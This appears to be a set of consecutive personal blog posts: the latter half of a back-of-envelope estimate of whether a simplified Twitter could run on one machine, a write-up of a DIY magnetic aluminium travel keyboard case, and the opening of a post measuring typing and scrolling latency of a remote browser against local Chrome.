But that's for the average, what if we assume that page refreshing spikes just as much as tweet rate at peak times. I don't think this is true, the tweet peak was set with tweeting synchronized on one TV event and lasted less than 30 seconds, but refreshes will be less synchronized even during busy events like the world cup. Let's calculate it anyways though!

per core = 2.5e6/(thread*second) * 2 thread => 5,000,000/second

peak delivery rate = max tweet rate * avg expansion => 30,000,000/second

peak cores needed = peak delivery rate / per core => 6

peak bandwidth = tweet avg size * peak delivery rate in Gbit/s => 42.24 Gbit/s

To estimate tweets per request, let's start by considering a Twitter without live timeline updating where a user opens the website or app a few times a day and then scrolls through their new tweets.

avg new connection rate = 3/day * daily active users in 1/s => 8,680.5556/s

tweets per request = delivery rate / avg new connection rate in 1 => 133.3333

Looks like my estimate of the full average tweet delivery rate of Twitter is 35x less than what my 8 core laptop can fetch! I also had chosen the average timeline size in the benchmark based on the estimate of normal timeline request sizes. It also looks like serving all the timeline RPCs is a fairly small amount of bandwidth during average load.

There’s lots of room for this to underestimate load or overestimate performance: Peak loads could burst much higher, I could get average timeline sizes or delivery rates wrong, and a realistic implementation would have more overheads. My estimates could be wrong in lots of ways, but there’s just so much performance margin it should be fine. My implementation even seems to scale linearly with cores, and there’s another 10x left before it would start hitting memory bandwidth limitations. Right now it can only add tweets from one thread, which I only have a 20x performance margin on (but from a known peak load), but with a little bit more effort with atomics that could be multi-core too.

This perhaps 350x safety margin, plus the fact that high-performance batched kernel-bypass RPC systems can achieve overheads low enough to do 10M requests/core-s, means I’m confident an RPC service which acted as the core database of simplified production Twitter could fit on one big machine. This is a very limited sense of running “Twitter” on one machine, you’d still have other stateless machines to act as web servers and API frontends to the high-performance binary RPC protocol, and of course this is only the very most basic features of Twitter.

There’s a bunch of other basic features of Twitter like user timelines, DMs, likes and replies to a tweet, which I’m not investigating because I’m guessing they won’t be the bottlenecks. Replies do add slightly to the load when writing a tweet, because they’d need to be added to a secondary chain or something to make retrieving them fast. Some popular tweets have tons of replies, but users only can see a subset, and the same subset can be cached to serve to every user.

To make my hedged confidence quantitative, I’m 80% sure that if I had a conversation with a (perhaps former) Twitter performance engineer they wouldn’t convince me of any factors I missed about Twitter load (on a much-simplified Twitter) or what machines can do, which would change my estimates enough to convince me a centralized RPC server couldn’t serve all the simplified timelines. I’m only 70% sure for a version that also does DMs, replies and likes, because those might be used way more than I suspect, and might pose challenges I haven’t thought about.

Conclusion-ish: It’s not practical to build this way, but maybe it could be

I don’t actually think people should build web apps this way. Here’s all the things I think would go wrong with trying to implement a Twitter-scale company on one machine, and the alternate universe system that would have to exist to avoid that problem:

Your one machine can die: Systems can have remarkable uptime when there’s just one machine, but that’s still risking permanent data loss and prolonged outages. You’d use at number of machines in different buildings in any real deployment. The framework could handle this semi-transparently with some extra cores and bandwidth per-machine using state machine replication and Paxos/Raft for failover.
RAM structures are easy but disks are tricky: You’d need the kind of NVMe virtual memory buffer manager I’ve mentioned hooked up with a transaction log so you can just write a Rust state machine like you would in RAM.
Bad code can use up all the resources: You’d need a bunch of enforcement infrastructure around this. Your task system would need preemption and subsystem memory/network/cpu budgets. You’d need to capture busy day production traces and replay them in pre-deploy CI.
A bug in one part can bring down everything: Normally network boundaries enforce design around failure handling and gracefully degrading. You’d need tools for in-system circuit breakers and failure handling logic, and static analysis to enforce this at the company level.
Zero-downtime deploys and schema evolution are tricky: You’d need tooling to do something like generate getters that check version tags on your data structures and dispatch. Evolveable often conflicts with structures being fixed-size, which means an extra random read for many operations, or having to do deploys via rewriting the whole database and having another system catch up to the present incrementally before cutting over.
Kernel-bypass binary protocol networking is hard to debug: It would take tons of tooling effort to catch up to the ecosystem of linux networking and text formats before debugging and observability would be as smooth.
What if you want to do something that doesn’t fit on the machine?: You’d want a system which could scale to multiple machines via some kind of state machine replication, remote paging and RPCs. If you want security boundaries between the machines that adds lots of access control complexity. Databases and multicore CPUs already have this kind of technology, but it’s not available outside them.

It’s possible to build systems this way right now, it just requires really deep knowledge and carefulness, and is setting yourself up for either disaster or tons of infrastructure work as your company scales. There’s a feedback loop where few companies in the web space scale this way, so the available open-source tooling for it is abysmal, which makes it really hard to scale this way. I think of scaling this way because I used to work for a trading company, where scaling systems to handle millions of requests per second per machine with microsecond latency kernel-bypass networking is a common way to do things and there’s lots of infrastructure for it. But they still use lots of machines for most things, and in many ways have a simpler problem (e.g. often no state persists between market days and there’s downtime between).

I do kind of yearn for this alternate-universe open source infrastructure to exist though. More hardware-efficient systems are cheaper, but I think the main benefit is avoiding the classic distributed systems and asynchrony problems every attempt to split things between machines runs into (which I’ve written a pseudo-manifesto on before), which means there’s potential for it to be way simpler too. It would also enable magic powers like time-travel debugging any production request as long as you mark the state for snapshotting. But there’s so much momentum behind the current paradigm, not only in terms of what code exists, but what skills readily hireable people have.

Edit: A friend points out that IBM Z mainframes have a bunch of the resiliency software and hardware infrastructure I mention, like lockstep redundancy between mainframes separated by kilometers. They also scale to massive machines. I don’t know much about them and am definitely interested in reading more, and if it weren’t for the insane cost I wouldn’t be surprised if I actually ended up liking modern mainframes as a platform for writing resilient and scalable software in an easy way.

That’s all I originally planned for this post, to show with reasonable confidence that you could fit the core tweet distribution of simplified Twitter on one machine using a prototype. But then it turned out I had tons of cores and bandwidth left over to tack on other things, so let’s forge ahead and try to estimate which other features might fit using all the extra CPU!

Directly serving web requests

The above simplified Twitter architecture doesn’t serve the whole simplified Twitter from one machine, and relies on stateless frontend machines to serve the consumer API and web pages. Can we also do that on the main machine? Let’s start by imagining we’ll serve up a maybe 64KB static page with a long cache timeout, and uses some minimized JS to fetch the binary tweet timeline and turn it into DOM.

A benchmark for fast HTTP servers shows a single machine handling 7M simple requests per second. That’s way above our average-case estimate of 15k/s from above, so there’s comfortable room to handle peaks and estimation error. Browser caches and people leaving tabs open on our static main page will probably also save us bandwidth serving it too. However HTTP is practically deprecated for providing no security.

Could we fit the bandwidth for 15k/s on a small NIC even without caching? Yes.

home page rate on a small connection = 10Gbit/s / 64KB in 1/s => 19,073.4863/s

I spent a bunch of time Googling for good benchmarks on HTTPS server performance. Almost everything I found was articles claiming the performance penalty over HTTP is negligible by giving CPU overhead numbers in the realm of 1% which include application CPU. The symmetric encryption for established connections with AES-ni instructions is actually fast at gigabytes per core-s, but it’s the public key crypto to establish sessions that’s worrying. When they do give out raw overhead numbers they say numbers like 3.5ms to do session creation crypto as if it’s tiny, which it is for most people, but we’re not being most people! That’s only 300 sessions/core-s! I can find some HTTPS benchmarks, but they usually simulate a small number of clients so don’t test connection establishment.

What likely saves us is session resumption and tickets, where browsers cache established crypto sessions so they can be resumed in future requests. This means we may only need to handle 1 session negotiation per user-week instead of multiple per day, and thus it’s probably possible for an HTTPS server to hit 100k requests/core-s under realistic loads (before app and bandwidth overhead). So even though I can’t find any actually good high-performance HTTPS server benchmarks, I’m going to say The machine can probably directly serve the web requests too.

I think there’s a 75% chance, conditional on an RPC backend fitting, that you could also serve web requests. Especially with a custom HTTP3 stack that used DPDK and very optimized static cached pages for a minimalist Twitter, with most uncertainty being maybe session resumption or caches can’t hit that often.

Post-prediction edit: Someone who worked at Twitter confirmed their actual request rates are lower than a fast HTTPS server could handle, but noted that crawlers mean a portion of the requests need to have the HTML generated server-side. I’m going to say crawlers are a separate feature, which I think might fit with careful page size attention and optimization, but might pose bandwidth and CPU issues.

Live updating and infinite scroll

The above is all assuming that people or a JS script refreshes with the latest tweets whenever a user visits a few times a day. But real Twitter offers live updates and infinite scrolling, can we do that?

In order to extend our estimates to live timelines, we'll assume a model of users connecting and then leaving a session open while they scroll around for a bit.

avg session duration = 20 minutes

live connection count = avg session duration * avg new connection rate in 1 => 10,416,666.6667

poll request rate = 1/minute * live connection count in 1/s => 173,611.1111/s

avg tweets per poll = delivery rate / poll request rate in 1 => 6.6667

frenzy push rate = avg expansion * max tweet rate => 30,000,000/second

To estimate the memory usage to hold all the connections I'll be using numbers from this websocket server.

tls websocket state = 41.7 GB / 4.9e6 in byte => 8,510.2041 byte

live connection count * tls websocket state in GB => 88.648 GB

The request rate is totally fine, but the main issue is the size of each poll request has gone down, which raises our fixed overhead. We probably have enough headroom that it’s fine, but we can do better either by caching the heap we use for iterating timelines and updating it with new tweets or directly pushing new tweets to open connections. This would require following the tweet stream and intersecting a B-Tree set structure of live connections with sorted follower lists from new tweets, or maybe checking a bitset for live users. This can be sharded trivially across cores and the average tweet delivery rate is low enough, if peaks are too much we can just slip on live delivery.

Infinite scrolling also performs better if we can cache a cursor at the end for each open connection, let’s check how much each cached connection-cursor costs:

cached cursor size = 8 byte * avg following => 3,200 byte

live connection count * cached cursor size in GB => 33.3333 GB

We can easily fit one at the start and one at the end in RAM! Given they can be loaded with one IO op it wouldn’t even really slow things down if they spilled to NVMe.

Images: Kinda!?

Images are something I initially thought definitely wouldn’t fit, but I was on a roll so I checked! Let’s start by looking at whether we can serve the images in people’s timelines.

I can't find any good data on how many images Twitter serves, so I'll be going with wild estimates looking at the fraction and size of images in my own Twitter timeline.

served tweets with images rate = 1/5

avg served image size = 70 KB

image bandwidth = delivery rate * served tweets with images rate * avg served image size in Gbit/s => 132.7407 Gbit/s

total bandwidth = image bandwidth + delivery bandwidth => 134.3704 Gbit/s

total bandwidth * 1 month in TB => 44,169.993 TB

That seems surprisingly doable! I work with machines with hundreds of gigabits/s of networking every day and Netflix can serve static content at 800Gb/s. This does require aggressive image compression and resizing, which is pretty CPU-intensive, but we can actually get our users to do that! We can have our clients upload both a large and a small version of each photo when they post them and then we won’t touch them except maybe to validate. Then we can discard the small version once the image drops out of the hot set.

However there’s lots that could be wrong about this estimate, and there’s less than 8x overhead from my average case to the most a single machine can serve. So traffic peaks may cause our system to have to throttle serving images. I think there’s maybe a 40% chance I’d say it would fit without dropping images at peaks, upon much deeper investigation with Twitter internal numbers, conditional on the basics fitting.

But what would it take to store all the historical large versions?

Tweets with images are probably more popular, so my timeline probably overestimates the fraction of tweets with images that we need to store. On the other hand this page says 3000/s but that would be fully half of average tweet rate so I kinda suspect that's a peak load number or something. I'm going to guess a lower number, especially cuz lots of tweets are replies and those rarely have images, and when they do they're reaction images that can be deduplicated. On the other hand we need to store images at a larger size in case the user clicks on them to zoom in.

stored image fraction = 1/10

avg stored image size = 150 KB

image rate = avg tweet rate * stored image fraction in 1/s => 578.7037/s

image storage rate = image rate * avg stored image size in GB/day => 7,680 GB/day

total storage rate = tweet storage rate + image storage rate in GB/day => 7,768 GB/day

total storage rate * 1 year in TB => 2,837.2037 TB

That amount of image back-catalog is way to big to store on one machine. Let's fall-back to using cold-storage for old images using the cheapest cloud storage service I know.

image replication bandwidth = image storage rate * $0.01/GB in $/month => $2,337.552/month

backblaze b2 rate = $0.005 / GB / month

cost per year of images = (image storage rate * 1 year in GB) * backblaze b2 rate in $/month => $14,025.312/month

Luckily Backblaze B2 also integrates with Cloudflare for free egress.

So if we wanted to stick strictly to one server we’d need to make Twitter like SnapChat where your images dissapear after a while, maybe make our cache into a fun mechanic where your tweets keep their images only as long as people keep looking at them!

Features that probably don’t fit and are hard to estimate

Video

Video uses more bandwidth than images, but on the other hand video compression is good and I think people view a lot less video on Twitter than images. I just don’t have that data though and my estimates would have such wild error bars that I’m just not going to try and say we probably can’t do video on a single machine.

Search

Search requires two things, a search index stored in fast storage, and the CPU to look over it. Using Twitter’s own posts about posting lists to get some index size estimates:

avg words per tweet = tweet content avg size / 4 (byte/word) => 35 word

posting list size per tweet = 3 (byte/word) * avg words per tweet + 16 byte => 121 byte

index size per year = avg tweet rate * posting list size per tweet * 1 year in TB => 22.0972 TB

It looks like a big NVMe machine could fit a few years of search index, although it would also need to store the raw historical tweets.

However I have no good idea how to estimate how much load Twitter’s search system gets, and it would take more effort than I want to estimate the CPU and IOPS load of doing the searches. It might be possible but search is a pretty intensive task and I’m guessing it probably wouldn’t fit, especially not on the same machine as everything else.

Notifications

The trickiest part of notifications is that computing the historical notifications list on-the-fly might be tricky for big accounts, so it probably needs to be cached per user. This probably would need to go on NVMe or HDD and be updated with a background process following the write stream, which also would send out push notifications, and could fall behind during traffic bursts. This is probably what Twitter does given old notifications load slowly and very old notifications are dropped. Estimating whether this would fit would be tricky, the storage and compute budget is already stretched.

Someone who worked at Twitter noted that push notifications from celebrities and their retweets can synchronize people loading their timelines into huge bursts. Randomly delaying celebrity notifications per user might be a necessary performance feature.

An ex-Twitter engineer who read a draft mentioned that a substantial fraction of all compute is ad-related. How much compute ads cost of course depends on exactly what kind of ML or real-time auctions go into serving the ads. Very basic ads would be super easy to fit, and Twitter makes $500M/year on “data licensing and other”. How much revenue you need to run a service depends on how expensive it is! You could imagine an alternate universe non-profit Twitter which just sold their public data dumps and used that for all their funding if their costs were pushed low enough.

Algorithmic Timelines / ML

Algorithmic timelines seem like the kind of thing that can’t possibly fit, but one thing I know from work at Anthropic is that modern GPUs are absolutely ridiculous monsters at multiplying matrices.

I don’t know how Twitter’s ML works, so I’ll have to come up with my own idea for how I’d do it and then estimate that. I think the core of my approach would be having a text embedding model turn each tweet into a high-dimensional vector, and then jointly optimize it with an embedding model on features about a user’s activity/preferences such that tweets the user will prefer have higher dot product, then recommend tweets that have unusually high dot product and sort the feed based on that. Something like Collaborative Filtering might work even better, but I don’t know enough about that to do estimates without too much research.

BERT is a popular sentence embedding model and clever people have managed to distill it at the same performance into a tiny model. Let’s assume we base our ML on those models running in bf16:

teraflop = 1e12 flop

tinybert flops = 1.2e9 flop in teraflop => 0.0012 teraflop

a100 flops = 312 teraflop/s

a40 flops = 150 teraflop/s

avg tweet rate * tinybert flops in teraflop/s => 6.9444 teraflop/s

delivery rate * tinybert flops / a100 flops in 1 => 4.4516

We need to do something with those BERT embeddings though, like check them against all the users. Normal BERT embeddings are a bit bigger but we can dimensionality reduce them down, or we could use a library like FAISS on the CPU to make checking the embeddings against all the users much cheaper using an acceleration structure:

embedding dim = 256

flops to check tweet against all users = daily active users * embedding dim * flop in teraflop => 0.064 teraflop

It's fine if the ML falls a bit behind during micro-bursts so let's use the average rate and see how much we can afford on some ML instances:

flops per tweet with p4d = 8 * a100 flops / avg tweet rate in teraflop => 0.4313 teraflop

flops per tweet with vultr = 4 * a40 flops / avg tweet rate in teraflop => 0.1037 teraflop

Looks like the immense power of modern GPUs is up to the size of our task with room to spare! We can embed every tweet and check it against every user to do things like cache some dot products for sorting their timeline, or recommend tweets from people they don’t follow. I’m not tied to this ML scheme being the best, but it shows we have lots of power available!

One way this estimate could go wrong is by using the theoretical flops. Generally you can approach that (but not actually get there) by using really large batch sizes, fused kernels and CUDA Graphs, but I generally work with much bigger models than this so it may not be possible! There’s also a variety of things around PCIe and HBM bandwidth I didn’t estimate, and maybe real Twitter uses bigger better models! Algorithmic timelines also add more load on the timeline fetching, since more tweets are candidates and the timelines need sorting, but we do have plenty of headroom there.

I can’t put a number on this one because I’m confident I could fit some ML, but it also probably wouldn’t be as good as Twitter’s actual ML and I don’t know how to turn that into a prediction. Some ML designs also place much more load on other parts of the system, for example by loading lots of tweets to consider for each tweet actually delivered in the timeline.

Bandwidth costs: They can be super expensive or free!

So far we’ve just checked whether the bandwidth can fit out the network cards, but it also costs money to get that bandwidth to the internet. It doesn’t affect the machines it fits on, but how much does that cost?

OVHCloud offers unmetered 10Gbit/s public bandwidth as an upgrade option from the included 1Gbit/s:

bandwidth price = ($717/month)/(9Gbit/s) in $/GB => $0.0002/GB

My friend says a normal price a datacenter might charge for an unmetered gigabit connection is $1k/month:

friend says colo price = $1000/(month*Gbit/s) in $/GB => $0.003/GB

This is the cheapest tier cdn77 offers without "contact us", and they're cheaper than other CDN providers:

cdn77 price = (($1390/month)/(150 TB / 1 month)) in $/GB => $0.0093/GB

vultr price = $0.01/GB

cloudfront 500tb price = $0.03/GB

The total cost will thus depend quite a bit on which provider we choose:

delivery bandwidth cost = bandwidth price * delivery bandwidth in $/month => $129.8272/month

delivery bandwidth cost(bandwidth price = cloudfront 500tb price) => $16,070.67/month

Things get much worse when we include image bandwidth:

total bandwidth cost = bandwidth price * total bandwidth in $/month => $10,704.8395/month

total bandwidth cost(bandwidth price = cdn77 price) => $409,308.6018/month

I was surprised by the fact that typical bandwidth costs are way way more than a server capable of serving that bandwidth!

But the best deal is actually Cloudflare Bandwith Alliance. As far as I can tell Cloudflare doesn’t charge for bandwidth, and some server providers like Vultr don’t charge for transfer to Cloudflare. However if you tried to serve Twitter images this way I wonder if Vultr would suddenly reconsider their free Bandwidth Alliance pricing as you made up lots of their aggregate Cloudflare bandwidth.

Edit: My friend says his colo charges for 10Gbit/s at close to the OVH rate, and notes that bandwidth isn’t fungible in that if you try to constantly peg your connections serving the entire world you may run into upstream bottlenecks and get throttled. This may be a place where CloudFlare could help you (maybe at some cost) or where you’d have to colo next to an internet exchange or something.

How cheaply could you serve Twitter: Pricing it out

Okay lets look at some concrete servers and estimate how much it would cost in total to run Twitter in some of these scenarios.

Basics and full tweet back catalog on one machine with bandwidth on OVHCloud: 1TB RAM, 24 cores, 10Gbit/s public bandwidth, 360TB of NVMe across 24 drives

$7,079/month in $/year => $84,948/year

Basics, images, ML, replication and tweet back catalog with 8 CPU Vultr machines with 25TB NVMe, 512GB RAM, 24 cores and 25Gbp/s, plus one ML instance.

8 * 2.34$/hr + $7.4/hr in $/year => $228,963.2184/year

cost per year of images * 5 in $/year => $841,518.72/year

Basics, images and ML but not full tweet back catalog on one machine with a AWS P4D instance with 400Gbps of bandwith, 8xA100, 1TB memory, 8TB NVMe:

$20,000/month in $/year => $240,000/year

total bandwidth cost(bandwidth price = $0.02/GB) in $/year => $10,600,798.32/year

To do everything on one machine yourself, I specced a Dell PowerEdge R740xd with 2x16 core Xeons, 768GB RAM, 46TB NVMe, 360TB HDD, a GPU slot, and 4x40Gbe networking:

server cost = $15,245

ram 32GB rdimms = $132 * 24 => $3,168

samsung pm1733 8tb NVMe = $1200 * 6 => $7,200

nvidia a100 = $10,000

hdd 20TB = $500 * 18 => $9,000

total server cost = server cost + ram 32GB rdimms + samsung pm1733 8tb NVMe + nvidia a100 + hdd 20TB => $44,613

colo cost = $300/month in $/year => $3,600/year

colo cost + total server cost/(3 year) => $18,471/year

So you do well on the server cost but then get obliterated by bandwidth cost unless you use a colo where you can directly connect to Cloudflare:

total bandwidth cost(bandwidth cost=friend says colo price) in $/year => $128,458.0741/year

Clearly optimizing server costs down to this level and below isn’t economically rational, given the cost of engineers, but it’s fun to think about. I also didn’t try to investigate configuring an IBM mainframe, which stands a chance of being the one type of “machine” where you might be able to attach enough storage to fit historical images.

For reference in their 2021 annual report, Twitter doesn’t break down their $1.7BN cost of revenue to show what they spend on “infrastructure”, but they say that their infrastructure spending increased by $166M, so they spend at least that much and presumably substantially more. But probably a lot of their “infrastructure” spending is on offline analytics/CI machines, and plausibly even office expenses are part of that category?

Conclusion

The real conclusion is kinda up in the middle, but I had a lot of fun researching this project and I hope it conveys some appreciation for what hardware is capable of. I had even more fun spending tons of time reading papers and pacing around designing how I would implement a system that let you turn a Rust/C/Zig in-memory state machine like my prototype into a distributed fault-tolerant persistent one with page swapping to NVMe that could run at millions of write transactions per second and a million read transactions per second per added core.

I almost certainly won’t actually build any of this infrastructure, because I have a day job and it’d be too much work even if I didn’t, but I clearly love doing fantasy systems design so I may well spend a lot of my free time writing notes and drawing diagrams about exactly how I’d do it:

Thanks to the 5 ex-Twitter engineers, some of whom worked on performance, who reviewed this post before publication but after I made my predictions, and brought up interesting considerations and led me to correct and clarify a bunch of things! Also to my coworker Nelson Elhage who offered good comments on a draft around reasons you wouldn’t do this in practice.

My DIY ergonomic travel workstation with aluminum and magnets

2022-11-06T00:00:00+00:00

Ever since moving from NYC to SF to work at Anthropic I’ve been visiting NYC and working remotely quite often. So I designed myself a travel workstation that lets me get the best of ergonomics and packability.

It includes a few off-the-shelf items, and a custom-designed laser cut aluminum keyboard case that doubles as a lap-board to hold my keyboard and trackpad:

I can use the keyboard and Magic Trackpad on a desk or on my lap, with the folding laptop stand keeping the screen at a comfortable height. The keyboard is a Sofle Choc I soldered together from a kit, modified with Purpz low force switches which I find way more comfortable than standard-force, and nice!nano wireless controllers.

The case only cost around $40, despite being made out of 3 different profiles made of very robust 2mm thick aluminum plate and only ordering two. It turns out SendCutSend is a magical service that offers ridiculously cheap custom laser cutting of lots of materials with less than one week turnarounds.

I’ve now been using it and traveling with it for many months and it’s been really great. I’m not aware of any similar off-the-shelf setup that combines a super light nice ergonomic keyboard with a Magic Trackpad on a lap board, that can be protected by a robust carrying case.

Transforming with magnets

The whole thing uses tons of little neodymium magnets super-glued in to the plates and gel taped to the electronics, to allow easily moving between the lap board configuration and a robust carrying case configuration to put in my bag. The keyboard halves snap into two different positions, one spread out and another closer together fully inside the case. The top half of the case also snaps on with magnets, with tabs to hold it in place horizontally.

The Magic Trackpad is far more robust than the keyboard PCBs so I shove it in a different small pocket of my bag.

Other setups

I can also use it to create a very comfortable reclined working setup by combining the lap board with a comfy recliner and a recliner laptop stand. The displays on modern Macbooks are really good and make this kind of setup a really comfortable way to use a computer. The stand arm just swings out of the way, and I place the lap board on the side table when I want to use the chair normally.

Or combine it with a standing desk:

Optimizing sleeping on flights

My other big travel optimization has been taking overnight flights and sleeping on them, which I didn’t used to be able to do without waking up constantly due to my neck hurting. I first mostly solved this using a trtl pillow, which unlike classic airplane pillows doesn’t constrict my neck blood flow and actually allows me to lean my head to the side.

Then my coworker recommended getting a medical foam cervical collar, which was even better and completely eliminated my neck pain sleeping on flights. I first got one that was too short, and then found the one I linked which suggests how to measure your chin height and offers a larger size. That one is also black which looks less medical.

If you don’t like standard foam ear plugs, I also recommend trying wax ear plugs which you shape into a pancake over your ear opening. They feel weird in a different way which is less stuffy and more comfortable for me.

More detail

I did my design in Fusion 360, and the first version I ordered was just a lap board, which I then had to hack adding a magic trackpad mount onto without quite enough space by stacking it on some hardboard:

I had the combo case/lapboard idea for the second version, and at first I planned to have an identical top and bottom plate. But SendCutSend prices are higher the more holes you want them to cut, so especially given I was also ordering a case for a friend, it was cheaper (and nicer looking) to have a separate top and bottom plate. The little indents on the side of the case were for in case the magnets didn’t work well and I needed to keep it closed by sliding elastic ribbons over it. You can download the DXF files if you want to order them yourself here

I then assembled it using cyanoacrylate glue, 6mm neodymium magnets, and double-sided gel tape to attach the magnets to the keyboard and trackpad. I needed to use sticky tack on the back of the magnet holes while putting the glue in so it wouldn’t run out. I also put neoprene foam on the back of the case to make it comfortable and grippy on my lap or the desk. I also reinforced the spacer joints with hot glue after super-gluing them, for redundancy at the cost of aesthetics. It took about 2 hours to assemble the case.

Before assembling it, I used a sharpie through the holes to mark dots on the back of the electronics, so that I could superglue magnets in place. I had to make sure to get the polarity of the magnets right so that the keyboard snapped in both positions. I went with opposite polarity on the left and right sides, that way I can attach the keyboard halves to each other for a lighter more fragile keyboard-carrying setup, and also kind-of attach the Magic Trackpad to the back of the case while it’s closed (I only thought of this after, the center magnets hurt this).

More on the Sofle Choc keyboard kit

The keyboard kit took me around 3.5 hours to solder. I’m really happy with the low force Purpz switches. I started using low force switches back with my original keyboard build when I had RSI issues and I think they made a noticeable difference then, and nowadays I still find them more comfortable. I’m not happy about soldering in the rotary encoders, I never use them and they add height, but I can’t really remove them now. The wireless controllers were nice for a bit, and it’s nice not to have a cable between the sides, but the battery life of the primary half is bad and I messed up the pairing a bit, so I mostly use it with a cable nowadays, this may be fixable. I’m quite happy with the Sofle Choc overall, the thumb keys are comfortable close to the main keyboard and it has lots of them, although the thumb keys all being in a line can make it hard to hit the right one relative to more clustered designs.

Other fun with SendCutSend

I haven’t really done any bloggable programming projects this year, because I’ve been doing more hardware stuff (and more socializing).

Some other stuff I’ve made with SendCutSend has included some prototype backing plates for the super bright LED lighting bar I’m designing:

I’ve also experimented with using DALL-E to ask for “minimalist black and white line art”, using vector tracing software, then cleaning up and modifying the design in Inkscape. This lets me create custom laser cut metal wall art cooler than I could design myself. Shown below are a powder-coated steel sign for a joke group house name, and brass snakes I helped make for someone:

Latency testing remote browsing: Why display streaming is hard

2022-05-15T00:00:00+00:00

Ever since I built my light sensor based latency tester, I’ve wanted to use it to illuminate where the added latency of remote desktop / display streaming systems really comes from. In fall of 2021 I was let into the beta program of a remote browser startup I’ll call Remotey (not their real name)¹. The idea is that you can save RAM on your machine and take advantage of powerful cloud computers with gigabit networking, but it means many interactions no longer take place on-device. I’ll use various latency tests I did with their product to illustrate the challenges inherent in providing a nice remote display experience on high-resolution displays, and talk about optimizations they could make to be much snappier.

Why this remote browser?

Their product is part of a new generation of app streaming systems which take advantage of GPU-accelerated encoding/decoding of common video compression formats. Examples include all the major game streaming services like GeForce Now and Google’s Stadia. Unfortunately, there’s a few things which make it tricky to use this approach to compete with legacy remote access systems let alone running locally for normal desktop apps like browsers. Parsec looks like a good try at doing so, but I haven’t tested it. I’m testing their remote browsing product because unlike Parsec, they provide a GPU-equipped remote server a mere 16ms ping from my NYC apartment for me.

All that is to say, while I’m going to talk about issues with this system and how it could be improved, I expect many of these issues apply to other desktop app streaming systems as well.

Typing latency

Let’s start by testing the latency between pressing a key and it appearing on screen in a text field, since that’s one of the simplest types of latency. I went to about:blank in Remotey and Chrome and added a <textarea> tag using the web inspector.

My latency tester sends USB events to repeatedly type a and backspace it, then types out summary lines. Here’s some simplified summary lines annotated with what I was measuring:

109ms +/-  15.2 (n=75) |        _5933_ __         | Remotey 4k window
 42ms +/-   8.6 (n=77) |   791_                   | Chrome 4k window
 37ms +/-   3.9 (n=33) |   94                     | Chrome small window
 95ms +/-  18.5 (n=65) |     11359741_            | Remotey small window
212ms +/-  24.0 (n=53) |                  _79652_ | Remotey 3780x6676 window

Despite the fact that my network round-trip to my Remotey server is only 16ms, Remotey adds around 67ms of latency with a maximized 4k window. The results for a local Chrome of close to 40ms for varying window sizes are about as good as I’ve seen for any app when measured at the top of on my Dell S2721Q monitor like this was, which means they’re close to the minimum latency a macOS desktop app can have.

This isn’t as bad as it may sound though. I can notice the difference, but mainly that it’s just a bit less pleasant. An extra 70ms typing latency is at the level where if you added it to most people’s computers between sessions, if it was consistent many wouldn’t notice anything was wrong, it just feels a tiny bit worse. Many people use keyboards that add 40ms of latency or screens that add 30ms. This is a problem Remotey pays attention to, they actually have a keyboard latency graph window accessible in their Debug menu, which shows latencies about 20ms lower than my end-to-end measurements, presumably because they don’t include the compositor/screen/USB stack.

Encoding the whole window means latency scales with window size

The interesting thing about these tests is how they show that Remotey’s latency scales with window size, even when only a small region changes. Most legacy remote desktop systems will use something called “damage regions” that apps provide to the OS compositor, in order to only process the pixels that change during small updates like typing. Even without such a system, it’s possible to diff tiles of a 4k screen image in under 2ms on a single CPU core to detect the changed region.

One disadvantage of the hardware accelerated video encode approach is that using minimal damage regions is tricky, because all you have is a vendor-provided API to encode new full frames into a video stream, and you can’t count on the vendor to optimize their encoder for large pixel-equal screen regions getting encoded very quickly. You could split the screen into many separate tile video streams, but that may or may not lead to encode/decode latency problems if the API/hardware isn’t optimized for many small streams, and artifacts may be hard to avoid. Another approach might be to have a separate side channel stream where you quickly send the small changed image patch to paste over the video, then update the video stream in the background the usual way.

In the last test above I set the 4k monitor to one of macOSs non-integer scaled presets, when you do this macOS will internally render a larger resolution at 2x scaling and then downscale the image. This causes huge internal resolutions that can cause performance issues even on native apps, the Preferences screen warns “Using a scaled resolution may affect performance”, and while some apps may seem fine, others like Remotey suffer. The full screen encoding approach relies on GPU encoding/decoding hardware keeping pace with growing screen resolutions, and can suffer when you try to jump to larger sizes.

H264 is lower latency but not the default

The numbers above get better when you use Remotey’s Debug menu to “Enable H264 encoding”, where the default is H265:

109ms +/-  15.2 (n=75) |        _5933_ __         | Remotey 4k window H265
 99ms +/-   8.7 (n=37) |        2691_             | ^ same but H264
 95ms +/-  18.5 (n=65) |     11359741_            | Remotey small window H265
 83ms +/-   9.1 (n=57) |      _9842               | ^ same but H264

The modern H265 encoding standard is better at compression, allowing more changing pixels to be streamed over a lower bandwidth connection, but it comes at the cost of more time spent encoding and decoding, which is where most of the lag comes from on highly compressible changes like this typing latency test.

Scrolling

Probably the most common operation while browsing the web is scrolling. I reconfigured my latency tester to scroll up and down small amounts, and then went to figma.com and had it scroll with the light sensor across a colored section transition:

119ms +/-  29.1 (n=94) |       _ 279921_      _   | Remotey 4k scroll H265
138ms +/-  12.9 (n=21) |           55997 1        | Remotey 4k scroll H265 50%
113ms +/-  11.5 (n=63) |         19551            | Remotey 4k scroll H264
146ms +/-  18.2 (n=60) |           234965 1       | Remotey 4k scroll H264 50%
 89ms +/-   6.5 (n=36) |      _9588_              | Chrome 4k smooth scroll
 49ms +/-   6.1 (n=52) |   _96                    | Chrome 4k non-smooth scroll

There’s some interesting things to see here:

Scrolling is a bit higher latency than typing. This is unsurprising given the approach, since even though motion vector encoding lets it not re-encode the whole image, it doesn’t succeed at compressing the frames quite as much as with typing, and encoding/decoding may be more expensive.
If we zoom the page out to 50% page zoom, scrolling gets slower despite the equivalent pixel count, presumably because there’s more visual entropy on screen and so encoding/decoding gets more expensive and frames get larger. Here H256 encoding starts to win out presumably due to better compression.
With the default macOS settings Chrome smooths USB mouse wheel scrolling to accelerate gradually, so it takes longer for the light sensor to cross the color transition, whereas Remotey scrolls instantly. If I disable macOS smooth scrolling for Chrome, it becomes nearly as fast as typing.

Scrolling is an interesting case for the video compression approach to display streaming. A compression approach specialized to scrolling could look for tiles of pixels at exact vertical offsets and then only send the tiles which aren’t translated copies. I haven’t found a major remote desktop system that does this, despite the importance of scrolling, but I implemented a version using an efficient tile row hashing technique which can process a 4k screen in 2ms on one core in an unmerged xrdp branch. This would dramatically cut encode/decode time and bandwidth for scrolling, and thus latency.

